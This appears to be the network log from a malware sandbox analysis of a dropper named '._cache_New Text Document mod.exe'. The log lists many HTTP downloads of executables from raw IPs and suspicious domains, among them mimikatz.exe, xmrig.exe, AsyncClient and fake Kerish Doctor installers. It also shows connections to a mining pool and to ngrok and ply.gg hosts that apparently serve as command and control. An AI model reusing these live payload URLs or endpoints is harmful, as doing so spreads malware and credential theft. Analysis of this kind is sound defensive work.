SZQPu6PMLT%2B9/vgq/%2BNGg6DNGpVeG5yfMqkdvUSLO4PdOfcqEZh2CTApKHY81Emi0oidW9hfQRk8UUUUJXDLcJbT3truT07MQDFf&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDmFUUebdtVGBXZHKwIkWLMu828ONV6A1J6JFM5XLOxDY59luhJ3oB8WqbzZKeWogKv-hkqw

tls, http2

firefox.exe

2.9kB
11.8kB
16
20

HTTP Request

GET https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2ctBeTcJk3yQyWzv7p5ftZ7BXiSiQCXbOMLPsnWu2syjTUhownMORHCrbTY6rklElEAO92evqnnriFVQ7nX2VhP7cU12k4HA8YyF%2B9JWL/MLDQzwV9s40uWz4H9R7p9RJBNE08ibeNYyPGfma8Q2pgiQBwTw0xXiX3261HSoGT%2BMvl75G%2BwRm8mFtueNIELot4LDB7LjQAj1sgOmdtc/zfjjSpwFjmR76TDC/ILS14crxDv7oU7z7NdwhlMazUuWTp/RLmCigwnBuABInkYvw1%2BNI2EPcjtZk6WngN%2B1au9NSjfu1P0/9BLilD3q/ObM28fxlpoMD3atZiS3lRF5MIPO8UnaCAbdPURKD6SqC2fX%2BTij63Jo9dcA%2BsmlVHobUqXnP3ErdSyCXD1YTqcj/7mWoHEgJUatcvKLcukZsOrreu4kkZ4HxX3j7Iu6TMRr0t%2BQ1qO3k6P801c3ZgJL4IE1jKQQ7TA4A94WW1mYfd3B3JFSnLfAJfXmX7wLwUmy0Jb8LGSOryx2ziaCS1gCb95VOf7KoiP5tgp9Ok11TFkI2hWhofFTgaWuZZEg09SIaJmOXhjKAKaVKA/N1xCSV9TFld7nnf81cSJtV4Ie/nnJeCp/4MFGW6sDjC1hrH628276qY2PuOx6OMn8VYvRL4VKg4CUNYZ7VCK8SZQPu6PMLT%2B9/vgq/%2BNGg6DNGpVeG5yfMqkdvUSLO4PdOfcqEZh2CTApKHY81Emi0oidW9hfQRk8UUUUJXDLcJbT3truT07MQDFf&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDmFUUebdtVGBXZHKwIkWLMu828ONV6A1J6JFM5XLOxDY59luhJ3oB8WqbzZKeWogKv-hkqw
66.102.1.94:443

https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2csRXyrGalPRDrZog%2B0MCvI2XgnjxMod41E9n1mBSm6ES5eaVN/LHrNPr/hLx%2Bx3d4T%2Bd0fOj1AwTfRiYpmWTaJbKsvRLslFInptwRKYtI8LMDFnqoPce7lNUr9NmzjMpOuey4KNRta35Wp23O6tS3fFyPb6Lm8AWq/xIjalTHWo4jSDcD2DVmSc/MdnEHzJPP5kZll/SZr3K4AG9sO0IyvqR/h65C/aHVj%2BSUMHHATxy5bnI3nIJSVhqVvs9cG%2BwuxFzj7nfPq4bmljzVzAYCOPr%2BnC1nCUtbS0y7KbHE5f3L98RAEzZkpHwVnTW4v2Lh0Qb85hdwJFYUHntqFVWI5JcMDtvJuIy%2BJg4s3ZVSQYLhc00cA0lQaUx5dl/nbpc8XPvOAk6gkoiu8O5/ooAu4fHPT9lKw3A0TRjQx9ZM1aj8NRwQ676WLQLv2OevSBt/6SWe0%2B//vyDYsxdvUdPE3RDjxwnSfSoiDxB2SQ7PPsRXBzH7XNMWis6Z9xhncVV4kgWIWQo1t39JOpKIfL1oYLMH3KLSUXyeciJYyrFED1chnU87HfeO32QlTGiB7iFx%2Bg%2Bf9d8rw4%2Bww0NoNYGZgQr6dM5pv95qBxHWzvY7on7N%2B%2B1chbwzaHQBsBt%2B5oAQt5yFtYErwjQgmN2mck4TWySwZa1/hxnNRg4Z0pxTwUgBC5OxHF8bBn0Z1FqBl1ozjkPhgq6OIHeWWpbs8ge7t4lmUHd%2Bx/CMsM97l4i78fKw2nPwXJMbeQ6iraiv8gPXYm%2BRu9&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDkM2xwLpn0G96CDL_Efu-4PI2mojgOKTCgw1LdLY1v9XIkaHu4iTDQOSmwA6D-HM-egYQzi

tls, http2

firefox.exe

2.9kB
8.6kB
17
21

HTTP Request

GET https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2csRXyrGalPRDrZog%2B0MCvI2XgnjxMod41E9n1mBSm6ES5eaVN/LHrNPr/hLx%2Bx3d4T%2Bd0fOj1AwTfRiYpmWTaJbKsvRLslFInptwRKYtI8LMDFnqoPce7lNUr9NmzjMpOuey4KNRta35Wp23O6tS3fFyPb6Lm8AWq/xIjalTHWo4jSDcD2DVmSc/MdnEHzJPP5kZll/SZr3K4AG9sO0IyvqR/h65C/aHVj%2BSUMHHATxy5bnI3nIJSVhqVvs9cG%2BwuxFzj7nfPq4bmljzVzAYCOPr%2BnC1nCUtbS0y7KbHE5f3L98RAEzZkpHwVnTW4v2Lh0Qb85hdwJFYUHntqFVWI5JcMDtvJuIy%2BJg4s3ZVSQYLhc00cA0lQaUx5dl/nbpc8XPvOAk6gkoiu8O5/ooAu4fHPT9lKw3A0TRjQx9ZM1aj8NRwQ676WLQLv2OevSBt/6SWe0%2B//vyDYsxdvUdPE3RDjxwnSfSoiDxB2SQ7PPsRXBzH7XNMWis6Z9xhncVV4kgWIWQo1t39JOpKIfL1oYLMH3KLSUXyeciJYyrFED1chnU87HfeO32QlTGiB7iFx%2Bg%2Bf9d8rw4%2Bww0NoNYGZgQr6dM5pv95qBxHWzvY7on7N%2B%2B1chbwzaHQBsBt%2B5oAQt5yFtYErwjQgmN2mck4TWySwZa1/hxnNRg4Z0pxTwUgBC5OxHF8bBn0Z1FqBl1ozjkPhgq6OIHeWWpbs8ge7t4lmUHd%2Bx/CMsM97l4i78fKw2nPwXJMbeQ6iraiv8gPXYm%2BRu9&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-hero-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDkM2xwLpn0G96CDL_Efu-4PI2mojgOKTCgw1LdLY1v9XIkaHu4iTDQOSmwA6D-HM-egYQzi
142.250.200.3:443

https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png

tls, http2

firefox.exe

1.9kB
7.0kB
14
14

HTTP Request

GET https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png
216.58.212.238:443

https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo

tls, http2

firefox.exe

3.6kB
11.2kB
17
21

HTTP Request

GET https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
10
12
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
11
12
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.4kB
11
14
142.250.187.238:443

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

tls, http2

firefox.exe

4.4kB
20.8kB
16
27

HTTP Request

GET https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
142.250.187.238:443

https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg

tls, http2

firefox.exe

3.3kB
8.9kB
20
23

HTTP Request

OPTIONS https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

OPTIONS https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg
142.250.187.234:443

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

firefox.exe

4.0kB
12.5kB
17
23

HTTP Request

POST https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
216.58.201.106:443

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

tls, http2

firefox.exe

4.2kB
35.7kB
23
34

HTTP Request

POST https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create
216.58.201.106:443

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping

tls, http2

firefox.exe

2.5kB
11.9kB
21
25

HTTP Request

OPTIONS https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

HTTP Request

OPTIONS https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping
142.250.187.234:443

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

firefox.exe

2.2kB
11.7kB
17
20

HTTP Request

OPTIONS https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
142.250.200.3:443

ssl.gstatic.com

tls, http2

firefox.exe

1.6kB
5.3kB
13
12
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
11
12
216.58.213.10:443

https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Du165d8aakbdu%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

tls, http2

firefox.exe

4.7kB
12.7kB
18
25

HTTP Request

POST https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Du165d8aakbdu%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
216.58.201.106:443

appsgrowthpromo-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.8kB
11
13
216.58.201.106:443

appsgrowthpromo-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.8kB
11
13
172.217.16.234:443

addons-pa.clients6.google.com

tls, http2

firefox.exe

1.5kB
10.8kB
13
13
172.217.16.234:443

addons-pa.clients6.google.com

firefox.exe

52 B
1
142.250.200.42:443

https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations

tls, http2

firefox.exe

2.2kB
11.7kB
16
21

HTTP Request

OPTIONS https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations
66.63.187.250:80

http://66.63.187.250/zmk/gem1.exe

http

._cache_New Text Document mod.exe

22.5kB
1.3MB
449
901

HTTP Request

GET http://66.63.187.250/zmk/gem1.exe

HTTP Response

200
216.58.212.234:443

youtube.googleapis.com

tls, http2

firefox.exe

1.4kB
5.5kB
10
9
142.250.200.42:443

addons-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.8kB
10
13
142.250.178.14:443

ogs.google.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
142.250.180.14:443

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

tls, http2

firefox.exe

1.5kB
8.9kB
15
21

HTTP Request

GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
88.221.134.155:80

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

http

firefox.exe

11.3kB
506.9kB
202
377

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

HTTP Response

200
142.250.178.14:443

contacts.google.com

tls, http2

firefox.exe

1.4kB
7.7kB
11
11
142.250.200.42:443

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

tls, http2

firefox.exe

4.0kB
12.6kB
17
23

HTTP Request

POST https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ
142.250.200.42:443

https://signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=iKs2tjZFiryrJNLyTQ-XUfNVbOVHhQyCKOF9Q6T_VzI&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=66184&CVER=22&zx=x03fel5wyxcw&t=1

tls, http2

firefox.exe

2.4kB
11.9kB
16
25

HTTP Request

OPTIONS https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

HTTP Request

OPTIONS https://signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=iKs2tjZFiryrJNLyTQ-XUfNVbOVHhQyCKOF9Q6T_VzI&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=66184&CVER=22&zx=x03fel5wyxcw&t=1
172.217.132.199:443

https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736790069,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736789390&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

tls, http

firefox.exe

174.5kB
14.9MB
3737
10715

HTTP Request

GET https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736790069,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736789390&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

HTTP Response

200
66.63.187.173:15666

gem1.exe

18.1MB
256.8kB
12962
6242
104.26.13.205:443

https://api.ipify.org/

tls, http

gem1.exe

804 B
4.1kB
9
8

HTTP Request

GET https://api.ipify.org/

HTTP Response

200
142.250.178.3:80

http://c.pki.goog/r/r4.crl

http

gem1.exe

608 B
5.0kB
8
6

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
151.101.130.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

5.9kB
656.2kB
121
478

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
106.53.83.169:80

._cache_New Text Document mod.exe

260 B
5
141.94.96.195:80

pool.supportxmr.com

http

2.2kB
11.9kB
30
29
151.101.130.49:443

urlhaus.abuse.ch

tls

3.8kB
656.9kB
74
481
185.215.113.16:80

260 B
5
142.250.179.238:443

docs.google.com

tls

1.8kB
11.4kB
14
15
142.250.178.3:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

http

828 B
1.6kB
8
5

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

HTTP Response

200
216.58.212.193:443

drive.usercontent.google.com

tls

2.0kB
14.7kB
16
22
185.215.113.16:80

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
185.215.113.16:80

260 B
5
185.215.113.16:80

260 B
5
31.41.244.11:80

260 B
5
185.215.113.16:80

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
45.93.20.67:80

260 B
5
142.250.178.14:443

apis.google.com

tls

2.0kB
1.3kB
11
9
142.250.179.238:443

docs.google.com

tls

1.4kB
7.7kB
10
12
31.41.244.11:80

260 B
5
185.215.113.16:80

260 B
5
45.93.20.67:80

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

3.2kB
659.9kB
62
483
106.53.83.169:80

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
31.41.244.11:80

260 B
5
185.215.113.16:80

260 B
5
45.93.20.67:80

260 B
5
185.215.113.16:80

260 B
5
45.93.20.67:80

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

3.2kB
660.1kB
62
481
106.53.83.169:80

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

3.7kB
660.1kB
73
482
151.101.130.49:443

urlhaus.abuse.ch

tls

3.8kB
660.6kB
74
483
185.215.113.16:80

260 B
5
185.215.113.16:80

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

5.3kB
659.9kB
107
482
151.101.130.49:443

urlhaus.abuse.ch

tls

5.2kB
660.6kB
104
482
31.41.244.11:80

260 B
5
45.93.20.67:80

260 B
5
45.93.20.67:80

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

5.1kB
659.9kB
102
483
151.101.130.49:443

urlhaus.abuse.ch

tls

5.0kB
659.9kB
101
482
185.215.113.16:80

260 B
5
45.93.20.67:80

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

4.6kB
660.6kB
92
482
151.101.130.49:443

urlhaus.abuse.ch

tls

4.7kB
660.1kB
94
481
103.24.179.18:7004

260 B
5
154.213.192.42:80

http://154.213.192.42/cbot.exe

http

762 B
25.8kB
15
22

HTTP Request

GET http://154.213.192.42/cbot.exe

HTTP Response

200
185.215.113.66:80

260 B
5
154.213.192.42:3778

564 B
452 B
12
11
185.81.68.147:80

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

4.2kB
659.9kB
83
483
151.101.130.49:443

urlhaus.abuse.ch

tls

4.6kB
660.1kB
91
481
45.93.20.67:80

260 B
5
185.199.111.133:443

raw.githubusercontent.com

tls

1.1kB
53.7kB
14
47
151.106.34.115:6573

http://151.106.34.115:6573/svhost.exe

http

54.2kB
7.2MB
1081
5170

HTTP Request

GET http://151.106.34.115:6573/svhost.exe

HTTP Response

200
45.138.16.193:80

260 B
5
151.101.2.49:443

urlhaus.abuse.ch

tls

5.1kB
659.9kB
103
483
151.101.2.49:443

urlhaus.abuse.ch

tls

5.8kB
659.9kB
119
482
185.215.113.16:80

260 B
5
87.121.86.2:8080

http://87.121.86.2:8080/mimikatz.exe

http

6.2kB
1.4MB
132
1003

HTTP Request

GET http://87.121.86.2:8080/mimikatz.exe

HTTP Response

200
47.90.142.15:2333

http://47.90.142.15:2333/123.exe

http

580 B
76.4kB
11
59

HTTP Request

GET http://47.90.142.15:2333/123.exe

HTTP Response

200
45.93.20.67:80

260 B
5
82.58.168.32:80

http://82.58.168.32/xmrig.exe

http

56.3kB
9.8MB
1184
7012

HTTP Request

GET http://82.58.168.32/xmrig.exe

HTTP Response

200
47.90.142.15:4567

2.6kB
2.0kB
50
50
23.27.51.244:80

http://23.27.51.244/chrtrome22.exe

http

1.1kB
14.2kB
22
14

HTTP Request

GET http://23.27.51.244/chrtrome22.exe

HTTP Response

200
151.101.2.49:443

urlhaus.abuse.ch

tls

12.1kB
659.9kB
234
483
151.101.2.49:443

urlhaus.abuse.ch

tls

10.0kB
660.2kB
202
483
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
106.53.83.169:80

260 B
5
185.199.111.133:443

raw.githubusercontent.com

tls

2.9kB
323.9kB
55
241
185.199.111.133:443

raw.githubusercontent.com

tls

6.7kB
373.1kB
127
276
20.26.156.215:443

github.com

tls

961 B
8.4kB
10
12
113.31.111.76:80

260 B
5
20.26.156.215:80

http://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe

http

854 B
460 B
14
4

HTTP Request

GET http://github.com/thomson101/XHP/releases/download/Release/Steanings.exe

HTTP Response

301

HTTP Request

GET http://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe

HTTP Response

301
185.215.113.16:80

260 B
5
20.26.156.215:443

github.com

tls

1.0kB
13.0kB
11
17
185.199.111.133:443

objects.githubusercontent.com

tls

15.2kB
2.8MB
310
1978
185.199.111.133:443

objects.githubusercontent.com

tls

9.4kB
372.4kB
158
278
89.23.101.77:1912

260 B
5
20.26.156.215:443

github.com

tls

810 B
7.9kB
9
11
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
208.95.112.1:80

http://ip-api.com/json/

http

374 B
640 B
5
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
31.41.244.10:80

260 B
5
212.56.41.77:1912

17.9MB
228.7kB
12908
5216
185.199.111.133:443

raw.githubusercontent.com

tls

26.3kB
3.4MB
542
2420
104.21.95.99:443

evilbit.pro

tls

817 B
4.3kB
8
8
20.107.53.25:25535

260 B
5
185.215.113.16:80

260 B
5
125.212.220.95:443

upload.vina-host.com

tls

2.3kB
372.2kB
42
272
80.72.24.103:443

test.aionclassic.pro

260 B
5
45.125.67.168:80

http://45.125.67.168/stelin/Crawl.exe

http

23.2kB
919.2kB
351
663

HTTP Request

GET http://45.125.67.168/stelin/Crawl.exe

HTTP Response

200
38.240.58.195:6606

260 B
5
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
185.141.35.21:2810

qrpn9be.localto.net

156 B
3
208.95.112.1:80

http://ip-api.com/json/

http

374 B
640 B
5
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
217.195.197.170:1604

260 B
200 B
5
5
185.199.111.133:443

raw.githubusercontent.com

tls

12.7kB
3.4MB
265
2460
31.41.244.11:80

260 B
5
185.215.113.16:80

260 B
5
20.26.156.215:80

http://github.com/TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe

http

624 B
274 B
11
3

HTTP Request

GET http://github.com/TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe

HTTP Response

301
20.26.156.215:443

github.com

tls

814 B
7.9kB
9
11
147.124.216.113:80

http://147.124.216.113/albt.exe

http

6.1kB
1.5MB
130
1081

HTTP Request

GET http://147.124.216.113/albt.exe

HTTP Response

200
66.63.187.250:80

http://www.kasihcommunityschool.sch.id/mk/drop2.exe

http

2.9kB
556.1kB
60
400

HTTP Request

GET http://www.kasihcommunityschool.sch.id/mk/drop2.exe

HTTP Response

200
82.140.14.10:8080

http://82.140.14.10:8080/02.exe

http

5.0kB
713.7kB
106
731

HTTP Request

GET http://82.140.14.10:8080/01.exe

HTTP Response

200

HTTP Request

GET http://82.140.14.10:8080/00.exe

HTTP Response

200

HTTP Request

GET http://82.140.14.10:8080/02.exe

HTTP Response

200
66.63.187.250:80

http://webmail.kasihcommunityschool.sch.id/mk/drop1.exe

http

24.6kB
1.4MB
445
988

HTTP Request

GET http://webmail.kasihcommunityschool.sch.id/mk/drop1.exe

HTTP Response

200
45.93.20.67:80

260 B
5
82.140.14.10:8080

http://82.140.14.10:8080/wudi.exe

http

22.6kB
1.7MB
405
1365

HTTP Request

GET http://82.140.14.10:8080/wudi.exe

HTTP Response

200
47.121.190.121:81

260 B
5
185.215.113.66:80

260 B
5
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
82.140.14.10:8080

http://82.140.14.10:8080/64.exe

http

22.9kB
1.5MB
439
1279

HTTP Request

GET http://82.140.14.10:8080/64.exe

HTTP Response

200
217.195.197.170:1604

260 B
200 B
5
5
45.93.20.67:80

260 B
5
125.212.220.95:443

upload.vina-host.com

tls

1.1kB
52.2kB
15
43
43.240.65.55:81

http://43.240.65.55:81/IMG001.exe

http

48.0kB
3.7MB
895
2629

HTTP Request

GET http://43.240.65.55:81/IMG001.exe

HTTP Response

200
185.221.219.112:80

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_2022.exe

http

426.9kB
27.3MB
8726
19559

HTTP Request

GET http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_2022.exe

HTTP Response

200
192.168.50.1:4782

260 B
5
185.221.219.112:80

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2023.exe

http

389.3kB
27.5MB
7897
19684

HTTP Request

GET http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2023.exe

HTTP Response

200
185.215.113.16:80

260 B
5
185.221.219.112:80

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor.exe

http

302.2kB
21.6MB
6302
15486

HTTP Request

GET http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor.exe

HTTP Response

200
66.63.187.173:15666

18.4MB
156.1kB
13176
3745
45.93.20.67:80

260 B
5
104.26.13.205:443

api.ipify.org

tls

1.0kB
4.1kB
10
8
185.215.113.16:80

260 B
5
185.221.219.112:80

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2021.exe

http

374.2kB
24.1MB
7766
17269

HTTP Request

GET http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2021.exe

HTTP Response

200
185.221.219.112:80

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.2.exe

http

376.7kB
24.5MB
7838
17539

HTTP Request

GET http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.2.exe

HTTP Response

200
217.195.197.170:1604

260 B
160 B
5
4
147.185.221.17:34002

run-motherboard.gl.at.ply.gg

260 B
5
185.221.219.112:80

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_XP.exe

http

243.8kB
16.3MB
4984
